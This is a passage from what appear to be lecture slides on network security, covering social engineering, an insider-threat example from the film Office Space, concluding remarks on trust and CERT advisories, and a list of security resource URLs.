… read off your AT&T card number and PIN and then I’ll get rid of the charge for you”

133
Social Problems
• Fun Example 3:
• Who saw Office Space?
• In the movie, the three disgruntled employees installed a money-stealing
worm onto the company's systems
• They did this from inside the company, where they had full access to the
company's systems
• What security techniques can we use to prevent this type of access?

134
Social Problems
• There aren’t always solutions to all of these problems
• Humans will continue to be tricked into giving out information they shouldn’t
• Educating them may help a little here, but, depending on how badly you want the information,
there are a lot of bad things you can do to get it
• So, the best that can be done is to implement a wide variety of solutions and
more closely monitor who has access to what network resources and information
• But, this solution is still not perfect

135
Conclusions
• The Internet works only because we implicitly trust one another
• It is very easy to exploit this trust
• The same holds true for software
• It is important to stay on top of the latest CERT security advisories to
know how to patch any security holes

136
Security related URLs
• http://www.robertgraham.com/pubs/network-intrusion-detection.ht
ml
• http://online.securityfocus.com/infocus/1527
• http://www.snort.org/
• http://www.cert.org/
• http://www.nmap.org/
• http://grc.com/dos/grcdos.htm
• http://lcamtuf.coredump.cx/newtcp/

137

You might also like